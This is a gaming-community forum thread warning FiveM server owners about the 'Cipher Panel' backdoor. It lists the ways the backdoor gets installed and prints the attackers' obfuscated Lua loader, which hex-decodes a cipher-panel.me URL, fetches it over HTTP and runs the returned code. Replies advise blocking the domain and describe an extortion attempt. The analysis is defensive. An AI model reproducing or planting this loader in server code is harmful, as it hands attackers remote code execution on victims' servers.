"Cipher Panel" FiveM Backdoor Update

fendi

Staff member
Administrator
Jun 20, 2021
473
32
133
22
Miami, Florida
Hello everyone!
We would like to update you on the FiveM Backdoor that has been going around.

This backdoor can be injected via an exploit... The current resources are
1. Leaked or Cracked resource
2. Cars or Maps packs from unknown sources
3. Via runcode when using a really poor rcon_password
4. Exploitable resources such as. (esx_kashracters,vrp_basic_menu (old version) and anyother resource that allow to run lua code on a server side without permission checking)

These guys are called Cipher, they are a group of French scammers attacking different vulnerable servers for money.
This is what their payload looks like
code_language.lua:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
    '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '72',
    '2e', '70', '68', '70', '3f', '74', '6f', '3d', '30'
}

function str_utf8()
    _empt = ''
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub('..', function (cc)
        return string.char(tonumber(cc, 16))
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)

It basically does a PerformHttpRequest call with a GET Request on https://cipher-panel.me/_i/r.php?to=0 loading the output of that request
Their web panel can access any server that has this backdoor installed on the server, and you can't stop it until you remove it.

We are already dealing with this problem
ChocoHax White searches for these backdoors, removes them, and cleans up your server from the malicious code.

Best regards.
 

CounterForce

Inactive
Jul 2, 2021
3
1
3
I think it is wise for people with dedicated servers or VPS's to block this url in their hosts-file (windows) or firewall (linux)...
That way, there is no traffic possible to that url...
 
  • Like
Reactions: CTron

CTron

Inactive
Jun 28, 2021
6
0
1
Wow, that's nice research and information you've got here.
Unfortunately I have been a victim to them and they wanted money from me. They even had a backdoor to our Discord via a Bot, a shame. Half of our Discord was deleted and the remainings were all mixed up.
We ignored them and they gave up after a while.

Good to know, how to fight these peeps.
Thanks, keep up the good work. (y)